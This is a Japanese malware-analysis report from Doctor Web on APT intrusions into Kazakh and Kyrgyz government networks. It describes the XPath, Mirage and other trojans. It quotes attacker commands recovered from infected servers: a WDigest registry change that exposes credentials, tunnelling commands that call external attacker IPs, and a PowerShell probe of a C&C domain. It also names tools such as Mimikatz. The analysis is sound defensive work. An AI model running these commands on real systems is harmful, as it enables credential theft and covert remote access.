2020年7月29日

株式会社Doctor Web Pacific

序論

大企業や政府機関に対する標的型サイバー攻撃は調査の対象として情報セキュリティスペシャリストたちの大きな関心を集めています。このようなインシデントに対する調査を行うことにより、ハッカーがコンピューターシステムに侵入する際に用いる戦略やツールについて分析を行うことが可能になり、その結果、適切な対抗措置を講じることができるようになります。標的型攻撃に使用されるソフトウェアは攻撃者の目標や目的に応じて開発されるため、多くの場合それぞれユニークなものであり、公に出回っていません。一般的な脅威と比較すると、そのようなマルウェアのサンプルが調査の対象になることはほとんどありません。さらに、標的型攻撃は複雑なメカニズムを使用することで悪意のあるアクティビティの痕跡を隠すことから、攻撃を受けた組織のインフラストラクチャ内への不正侵入を検知することは一層困難なものとなります。

2019年3月、Doctor Webはクライアントであるカザフスタン共和国の国家機関から組織のネットワークコンピューターの1つにマルウェアが存在するという連絡を受けました。これをきっかけに調査が開始され、国家機関に対する本格的な標的型攻撃に使用されたトロイの木馬プログラムのファミリーがDoctor Webのスペシャリストによって初めて発見されることとなりました。Doctor Webの作成した資料により、組織内のコンピューターネットワークに侵入したサイバー犯罪者の用いたツールとその目的について詳しい内容が明らかになりました。調査の結果によると、組織のコンピューターネットワークは少なくとも2017年12月から侵害されています。

2020年2月には、組織ネットワークが感染している兆候があるという同様の問題についてキルギス共和国の国家機関から連絡を受け、Doctor Webのスペシャリストはネットワーク内で複数の悪意のあるプログラムが動作していることを突き止めました。このマルウェアの亜種の一部はカザフスタンでの攻撃にも使用されていました。調査の結果、前回と同様に最初の感染は調査を開始するずっと前、すなわち2017年3月に始まっていたことが明らかになりました。

いずれのインフラストラクチャ内にも不正なプログラムが3年以上存在し続けていたこと、また、サーバーのイベントログから完全に異なるトロイの木馬ファミリーの存在が明らかになったことから、これら攻撃の背後には複数のハッカーグループが関与しているものと考えられます。これらの攻撃で使用されたトロイの木馬のいくつかは良く知られているものです。それらの一部は特定のAPTグループのみが使用するツールで、その他は中国のさまざまなAPTグループによって使用されているものでした。

攻撃とツールに関する全般的情報

Doctor Webでは、攻撃を受けたカザフスタンとキルギスの機関のネットワークサーバー数台から得られた情報について詳細な調査を行いました。調査対象となったデバイスにはすべてMicrosoft Windowsが搭載されていました。

標的型攻撃に使用されたマルウェアは以下の2つのカテゴリーに分類することができます。

• ネットワーク内のほとんどのコンピューターにインストールされる一般的なマルウェア
• 攻撃者が特に関心を持っているサーバーにインストールされる特別なマルウェア

分析されたマルウェアサンプルと攻撃に使用されたユーティリティから、次のような攻撃シナリオが想定されます。脆弱性を悪用してネットワークコンピューターへのアクセスを果たした後、ハッカーは BackDoor.PlugX の亜種の1つをアップロードします。このトロイの木馬のペイロードは、攻撃者が感染したコンピューターを遠隔操作し、ネットワークを通じて他のコンピューターを感染させることを可能にします。最初の感染に使用されたと考えられるもう1つのトロイの木馬が BackDoor.Whitebird.1 です。このバックドアは64ビット版OSで動作するよう設計されており、C&Cサーバーとの暗号化された接続やファイルマネージャー、プロキシ、そしてコマンドシェル機能を介した遠隔操作をサポートするといった幅広い機能を備えています。

ネットワークへの侵入を果たした後、攻撃者は特殊なマルウェアを使用してタスクを実行します。特殊なトロイの木馬プログラムは次のようにして感染したデバイス間に広がります。

Domain controller #1:

Trojan.Misics
Trojan.XPath

Domain controller #2:

Trojan.Misics
Trojan.Mirage

Domain controller #3:

BackDoor.Mikroceen
BackDoor.Logtu

Server #1:

BackDoor.Mikroceen

Server #2:

Trojan.Mirage
BackDoor.CmdUdp.1

これらトロイの木馬の中でも最も興味深いのがXPathファミリーです。Doctor Webの知る範囲では、このファミリーの亜種はこれまで一度も公表されていません。XPathファミリーは侵害されたシステム内でのネットワークアクティビティと存在の痕跡を隠すためのルートキットを備えており、攻撃されたサーバーにインストールされていたDr.Webアンチルートキットによってそれらのルートキットが検出されています。調査対象となったサンプルは2017～2018年に収集されたもので、これら悪意のあるプログラムはそれより数年前にリリースされたオープンソースプロジェクトを基にしたものとなっています。すなわち、調査対象となったサンプルは2013～2015年にリリースされたWinDivertパッケージを使用しています。このことは、XPathの最初の亜種もまた同じ期間に開発された可能性があるということを間接的に示しています。

XPathはモジュール型トロイの木馬であり、マルウェアの動作におけるそれぞれの段階に合わせて各コンポーネントがその機能を実行します。感染プロセスは Trojan.XPath.1 として検出されたインストーラの動作によって開始されます。インストーラは本体にハードコードされた暗号化された設定ファイルを使用し、ドライバをインストールするか、または COM Hijacking 手法を用いてペイロードを実行します。モジュールは暗号化とデータ圧縮の両方を使用してシステムレジストリ内に格納されます。

Trojan.XPath.2 はドライバで、別のモジュールを同時に実行することにより、侵害されたシステム内での悪意のあるアクティビティを隠します。このドライバは中国語のデジタル署名を持ち、オープンソースプロジェクトを基にしています。システムレジストリ内に格納される他のコンポーネントとは異なり、ドライバファイルはディスク上に置かれ、悪意のあるプログラムは密かに実行されます。ドライバファイルをディスク上に隠すだけでなく、このコンポーネントはペイロードのローダーを lsass.exe プロセスに挿入し、トロイの木馬のネットワークアクティビティを隠すよう設計されています。その動作シナリオはOSのバージョンによって異なります。

Trojan.XPath.3 として検出されたライブラリは、元の名前を PayloadDll.c という3つ目のコンポーネントです。システムレジストリに保存されたペイロードを COM Hijacking を用いてsvhost.exeプロセスに挿入する中間モジュールです。

主な機能は、 Trojan.XPath.4 として検出されたペイロードモジュールに含まれています。 このコンポーネントはC++で記述されており、オープンソースプロジェクトも基にしています。本調査で解析された多くのマルウェアと同様、このトロイの木馬も感染したコンピューターに不正アクセスし、機密データを盗むよう設計されています。その主な特徴は2つのモードで動作することができるという点です。1つ目はクライアントモードです。このモードでは、トロイの木馬はC&Cサーバーに接続し、コマンドを待ちます。2つ目はエージェントモードです。このモードでは、 Trojan.XPath.4 はサーバーとして動作します。すなわち、特定のポートをリッスンし、他のクライアントがそれらに接続するのを待ち、これらのクライアントにコマンドを送信します。これにより、攻撃者は攻撃を受けたネットワーク内にローカルのC&Cサーバーを設置して、外部のC&Cサーバーからネットワーク内の感染したコンピューターに送信されるコマンドをリダイレクトすることが可能になります。

XPathファミリーとその動作の詳細については、調査報告の PDFバージョン(英語)またはDr.Webウイルスライブラリを参照してください。

もう1つの興味深い発見は、 Trojan.Mirage のコマンドシェルへのアクセス実装です。コマンドシェルの入出力の切り換え (I/O redirection) を実行するためにマルウェアはファイルを使用していましたが、Doctor Webでは感染したサーバーからそれらのファイルを取得することに成功しました。ファイルから、次のトロイの木馬の機能を使用してサイバー犯罪者によって実行されたコマンドと、その応答として受信したデータを確認することができます。

reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f
ipconfig /displaydns
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 53,80,443
c:\windows\debug\windbg.exe -n 202.74.232.2 -o 143,110
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Wdigest

起動されたwindbg.exeファイルは、PortQryと呼ばれる TCP/UDP ポートスキャナーユーティリティでした。

本調査では、中央アジア諸国のこれらの機関に対する標的型攻撃に関連性があるということを間接的に裏付ける証拠が発見されました。発見された BackDoor.PlugX.38 と呼ばれるサンプルは nicodonald[.]accesscam[.]org ドメインを使用していましたが、これは ICEFOG NG としても知られる BackDoor.Apper.14 のC&Cサーバーとしても使用されていたものです。このファミリーに属するバックドアは、数年前にカザフスタンの国家機関に対して送信されたフィッシングメール内でDoctor Webによって発見されています。また、 BackDoor.Apper.14 のサンプルをインストールするためのRTFドキュメントは2019年3月19日に初めてカザフスタンからVirusTotalにアップロードされています。

キルギスのインシデントにおける興味深い発見は、感染したサーバー上で検出されたバックドア Logtu と Mikroceen です。カザフスタンとキルギス両方のインシデントで同じようなマルウェアが使用されていたことに加え、この Mikroceen は2つの攻撃が関連している可能性を示唆しています。この高度に特殊化されたバックドアのサンプルは両方のネットワークで見つかり、いずれの場合もドメインコントローラーにインストールされています。

これらの攻撃に関連したサンプルの調査中に、コマンドシェルに対する BIND Shell アクセスを実行する、特別に作成されたバックドアが発見されました。このプログラムのデバッグ情報には中国語のプロジェクト名「正向马源码」が含まれており、これは、このトロイの木馬の出所を示唆するものである可能性があります。

攻撃者は悪意のあるプログラムに加えて、ネットワーク内で感染を広めるために、公的に利用可能な次のユーティリティを使用しています。

• Mimikatz
• TCP Port Scanner V1.2 By WinEggDrop
• Nbtscan
• PsExec
• wmiexec.vbs
• goMS17-010
• ZXPortMap v1.0 By LZX
• Earthworm
• PortQry version 2.0 GOLD

以下は上記ユーティリティのいくつかの起動例です。

• ZXPortMap: vmwared.exe 21 46.105.227.110 53
• Earthworm: cryptsocket.exe -s rssocks -d 137.175.79.212 -e 53

このAPTグループは、感染したコンピューターやその他のデバイスに関する情報を収集したり、感染したコンピューターからC&Cサーバーの状態を確認したりするなど、さまざまなタスクを実行するために独自のPowerShellスクリプトも積極的に使用しています。また、組織の一部の従業員の Microsoft Exchange Server メールボックスからすべての中身をダウンロードするよう設計された PowerShell スクリプトも発見されました。

以下は、感染したサーバーで実行されていたPowerShellスクリプトの例です。

%COMSPEC% /Q /c tasklist /v >>c:\programdata\2.txt
%COMSPEC% /Q /c systeminfo >>c:\programdata\2.txt
%COMSPEC% /Q /c netstat -nvb    >> c:\programdata\2.txt
powershell -exec bypass -command "& {  foreach($i in 53,80,443){ echo ((new-object Net.Sockets.TcpClient).Connect('v.nnncity.xyz',$i))  "port:"$i } 2 > $null  }" >>c:\programdata\2.txt

結論

本調査においてDoctor Webはこれらの攻撃に使用されたトロイの木馬のファミリーを複数発見し、また、サンプルと悪意のあるアクティビティに関する解析の結果、最初の感染は組織の従業員がマルウェアの存在を示す最初の兆候に気が付くずっと以前に発生していたことが明らかになりました。多くの場合、マルウェア開発者は感染させたシステム内でそれらの存在を隠すことに多大なリソースを割いています。それを踏まえると、残念ながらこのシナリオは成功したAPT攻撃の例であると言わざるをえません。

本調査は主要な感染ベクターやインフラストラクチャ全体における感染の全体像については対象としていません。本報告内で取り上げたトロイの木馬はこれらの攻撃に使用されたマルウェアの一部にすぎないということは疑いの余地のないものと考えられます。ハッカーは、不正なプログラムの存在を検出することだけでなく、ネットワークオブジェクトのコントロールを取り戻すことをも極めて困難なものにするようなメカニズムを使用しています。

リスクを最小限に抑えるには、内部ネットワークリソース、中でもドメインコントローラーやメールサーバー、インターネットゲートウェイなどの攻撃者にとって特に関心の高いサーバーを絶えず監視する必要があります。システムが侵害された場合、効果的な対抗措置を講じるために状況の迅速かつ適切な分析が必要となります。Doctor Webではアンチウイルスソフトウェアの制作だけでなく、標的型攻撃を含む、ウイルスに関連したコンピューターインシデントに関する調査サービスも提供しています。企業ネットワーク内で悪意のあるアクティビティが疑われる場合、取るべき最良の手段はDoctor Webラボに連絡することです。資格を有する経験豊富なスタッフによるヘルプを提供いたします。早期に対処することで被害を最小限に食い止め、標的型攻撃による最悪の結果を防ぐことができます。

Indicators of compromise（攻撃の痕跡情報）